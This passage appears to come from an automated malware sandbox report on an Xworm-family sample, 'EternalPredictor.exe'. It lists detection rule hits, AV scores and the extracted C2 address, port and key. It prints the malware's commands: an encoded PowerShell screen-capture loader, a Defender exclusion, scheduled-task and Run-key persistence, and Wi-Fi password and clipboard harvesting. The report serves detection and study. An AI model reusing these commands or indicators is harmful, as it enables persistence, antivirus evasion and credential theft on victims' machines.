CAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\eternal.exe, ProcessId: 5604, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
                        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
                        Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7544, ProcessName: cmd.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", ProcessId: 4920, ProcessName: cmd.exe
                        Sigma detected: SCR File Write Event
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\program.exe, ProcessId: 2360, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\eternal.exe, ProcessId: 5604, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\eternal.exe" , ParentImage: C:\Users\user\AppData\Roaming\eternal.exe, ParentProcessId: 5604, ParentProcessName: eternal.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", ProcessId: 4424, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Execution of Powershell with Base64
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\eternal.exe" , ParentImage: C:\Users\user\AppData\Roaming\eternal.exe, ParentProcessId: 5604, ParentProcessName: eternal.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", ProcessId: 4424, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Screensaver Binary File Creation
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\program.exe, ProcessId: 2360, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: consent.exe 6092 324 0000019985E22B80, ParentImage: C:\Windows\System32\consent.exe, ParentProcessId: 7816, ParentProcessName: consent.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 6092, ProcessName: svchost.exe
                        Sigma detected: Dynamic CSharp Compile Artefact
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7984, TargetFilename: C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe', ProcessId: 5520, ProcessName: powershell.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Dot net compiler compiles file from suspicious location
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Capture Wi-Fi password
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7620, ProcessName: cmd.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-17T11:23:34.191338+010028531931Malware Command and Control Activity Detected192.168.2.849728147.185.221.2333942TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: EternalPredictor.exeAvira: detected
                        Found malware configuration
                        Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["147.185.221.23"], "Port": 33942, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Roaming\eternal.exeReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Roaming\program.exeReversingLabs: Detection: 44%
                        Source: C:\Users\user\AppData\Roaming\skuld.exeReversingLabs: Detection: 63%
                        Multi AV Scanner detection for submitted file
                        Source: EternalPredictor.exeVirustotal: Detection: 56%Perma Link
                        Source: EternalPredictor.exeReversingLabs: Detection: 57%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Machine Learning detection for sample
                        Source: EternalPredictor.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: 147.185.221.23
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: 33942
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: <123456789>
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: <Xwormmm>
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: Group1
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: USB.exe
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: %AppData%
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpackString decryptor: XClient.exe

                        Privilege Escalation

                        barindex
                        UAC bypass detected (Fodhelper)
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeRegistry value created: NULL C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeRegistry value created: DelegateExecute
                        Source: EternalPredictor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: EternalPredictor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdb source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
